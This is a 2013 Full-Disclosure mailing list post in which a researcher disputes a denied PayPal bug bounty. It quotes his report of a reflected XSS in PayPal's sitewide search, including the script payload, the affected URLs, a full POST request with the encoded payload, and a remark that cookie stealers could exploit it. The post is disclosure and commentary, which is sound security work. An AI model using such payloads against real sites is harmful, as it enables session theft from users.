[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me
From: Shubham Shah <shahshubham369 () gmail ! com>
Date: 2013-05-29 14:38:16
Message-ID: 51A612D8.9080109 () gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same
field that Kugler reported, on the same domain of "paypal.com"* -
However, I too did not receive a bug bounty.
My name is Shubham Shah, also a security researcher. And coincidentally
but similarly to Robert Kugler. I too found a cross site scripting
vulnerability on PayPal's "sitewide-search" module. My exploit was
similar to his, it affected the same parameters except I had used an
alternate vector - after fiddling with the search system for some time.
The real controversy is however, I am *under 18 years old* and I, in the
past have received money from their program under my older siblings
PayPal account, with permission. When I reported the XSS pretty much the
same as Kugler reported, I was "not eligible for a bounty" because
"Another researcher already discovered the bug". Please take a look at
the attached emails and screenshots.
Here is what I sent to the Site Security team via their PGP portal:
====================================================
To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/* \
This XSS vulnerability is a POST type, on the affected script "searchscr?cmd=_sitewide-search" \
Affected domains: https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.
The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does \
not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can \
create such a vector.
XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of \
any HTML or script injection (without the square brackets)
This exploit has the capability of stealing a large number of user cookies in a short period of \
time with cookie stealers. If needed I can also provide a PoC for this. This can be done \
stealthily and would cause major mayhem if exploited!
Here is some proof of concept images:
http://pasteboard.co/2lU54Wuj.png (PNG file hosted on pasteboard.co) - document.cookie xss on \
firefox
Here is my personal HTTP Headers for making this exploit execute:
POSThttps://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search 1.1
Host:www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countst \
r_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Csc \
ript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28documen \
t.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8
Thank you for your time in reading this, Shubham Shah
====================================================
Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message
On 05/13/2013 7:47 AM I got told by paypal that:
====================================================
Hi Shubham,
We regret to inform you that your bug submission was not eligible for a bounty for the \
following reason. Another researcher already discovered the bug.
Thank you for your participation. We take pride in keeping PayPal the safer place for online \
payment.
Thank you,
PayPal Security Team
====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print
screen of the far right side, I included the barebones - print version
of the message - so others can verify the date I received the response.
Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was
able to report the vulnerability 8 days earlier than Robert - and still
did not receive any acknowledgement.
Frankly, I was okay with it and moved on. I do not actually have much
against the bounty as I have been paid numerous times. PayPal has
honoured many of my vulnerabilities. However, I can tell you that
recently none of my security submissions have been honoured - they state
that all my newer submissions have been already reported - I have no
actual way of verifying if they have or not, so I just move on and
continue pentesting with spirit
Also, Robert, I am amazed by your work done with security regarding
Mozilla! They were awesome finds! Solid stuff man, I hope one day that I
can move onto learning more about application security.
[Attachment #5 (text/html)]
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body text="#000000" bgcolor="#FFFFFF">
Heya everyone,<br>
<b>On the 11th of May, 2013, I reported an XSS that affected the
very same field that Kugler reported, on the same domain of
"paypal.com"</b> - However, I too did not receive a bug bounty.<br>
My name is Shubham Shah, also a security researcher. And
coincidentally but similarly to Robert Kugler. I too found a cross
site scripting vulnerability on PayPal's "sitewide-search" module.
My exploit was similar to his, it affected the same parameters
except I had used an alternate vector - after fiddling with the
search system for some time. The real controversy is however, I am <b>under
18 years old</b> and I, in the past have received money from their
program under my older siblings PayPal account, with permission.
When I reported the XSS pretty much the same as Kugler reported, I
was "not eligible for a bounty" because "Another researcher already
discovered the bug". Please take a look at the attached emails and
screenshots.<br>
<br>
Here is what I sent to the Site Security team via their PGP portal:<br>
====================================================<br>
<pre id="textPlain" required="true" style="font-family: 'Luxi Sans', 'Bitstream Vera Sans', \
Arial, Helvetica, sans-serif; margin: 0px; color: rgb(0, 0, 0); font-size: 12px; font-style: \
normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; \
orphans: auto; text-align: start; text-indent: 0px; text-transform: none; widows: auto; \
word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);" \
wrap="">To Paypal Site Security Team, Recently I have discovered an XSS vulnerability which \
affects the wide majority of Paypal.com/* This XSS vulnerability is a POST type, on the \
affected script "searchscr?cmd=_sitewide-search" Affected domains:
<a class="moz-txt-link-freetext" \
href="https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search">https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search</a>
(The * indicates any country code)
for example:
<a class="moz-txt-link-freetext" \
href="https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search">https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search</a>
<a class="moz-txt-link-freetext" \
href="https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search">https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search</a>
<a class="moz-txt-link-freetext" \
href="https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search">https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search</a>
etc.
The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does \
not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can \
create such a vector.
XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] \
in front of any HTML or script injection (without the square brackets)
This exploit has the capability of stealing a large number of user cookies in a short period of \
time with cookie stealers. If needed I can also provide a PoC for this. This can be done \
stealthily and would cause major mayhem if exploited!
Here is some proof of concept images:
<a class="moz-txt-link-freetext" \
href="http://pasteboard.co/2lU54Wuj.png">http://pasteboard.co/2lU54Wuj.png</a> (PNG file hosted \
on pasteboard.co) - document.cookie xss on firefox
Here is my personal HTTP Headers for making this exploit execute:
POST <a class="moz-txt-link-freetext" \
href="https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search">https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search</a> \
1.1
Host: <a class="moz-txt-link-abbreviated" href="http://www.paypal.com">www.paypal.com</a>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <a class="moz-txt-link-freetext" \
href="https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search">https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search</a>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E& \
;countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString \
_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cs \
cript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8
Thank you for your time in reading this, Shubham Shah</pre>
====================================================<br>
<p>Screenshots to prove date of submission and actual message:<br>
<a class="moz-txt-link-freetext" href="http://pbrd.co/18ugpSY">http://pbrd.co/18ugpSY</a> \
<= Date submitted proof<br>
<a class="moz-txt-link-freetext" href="http://pbrd.co/18ugFRZ">http://pbrd.co/18ugFRZ</a> \
<= Proof of message<br> </p>
On <span style="color: rgb(0, 0, 0); font-family: 'Luxi Sans',
'Bitstream Vera Sans', Arial, Helvetica, sans-serif; font-size:
12px; font-style: normal; font-variant: normal; font-weight:
normal; letter-spacing: normal; line-height: normal; orphans:
auto; text-align: -webkit-right; text-indent: 0px; text-transform:
none; white-space: normal; widows: auto; word-spacing: 0px;
-webkit-text-stroke-width: 0px; background-color: rgb(237, 243,
254); display: inline !important; float: none;">05/13/2013 7:47 AM</span>
I got told by paypal that:<br>
====================================================<br>
<pre id="textPlain" required="true" style="font-family: 'Luxi Sans', 'Bitstream Vera Sans', \
Arial, Helvetica, sans-serif; margin: 0px; color: rgb(0, 0, 0); font-size: 12px; font-style: \
normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; \
orphans: auto; text-align: start; text-indent: 0px; text-transform: none; widows: auto; \
word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);" \
wrap="">Hi Shubham,
We regret to inform you that your bug submission was not eligible for a bounty for the \
following reason. Another researcher already discovered the bug.
Thank you for your participation. We take pride in keeping PayPal the safer place for online \
payment.
Thank you,
PayPal Security Team
</pre>
<p>====================================================<br>
Once again, here are some screenshots:<br>
<a class="moz-txt-link-freetext" href="http://pbrd.co/18uhtGD">http://pbrd.co/18uhtGD</a> \
<= Proof of date I submitted it<br>
<a class="moz-txt-link-freetext" href="http://pbrd.co/18uhMkI">http://pbrd.co/18uhMkI</a> \
<= Proof of message - As I could not take a print screen of the far right side, I included \
the barebones - print version of the message - so others can verify
the date I received the response.<br>
</p>
<p>Thanks for reading through,<br>
I actually didn't get anything from PayPal similar to Robert, but
I was able to report the vulnerability 8 days earlier than Robert
- and still did not receive any acknowledgement.<br>
Frankly, I was okay with it and moved on. I do not actually have
much against the bounty as I have been paid numerous times. PayPal
has honoured many of my vulnerabilities. However, I can tell you
that recently none of my security submissions have been honoured -
they state that all my newer submissions have been already
reported - I have no actual way of verifying if they have or not,
so I just move on and continue pentesting with spirit<br>
</p>
Also, Robert, I am amazed by your work done with security regarding
Mozilla! They were awesome finds! Solid stuff man, I hope one day
that I can move onto learning more about application security.<br
class="Apple-interchange-newline">
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic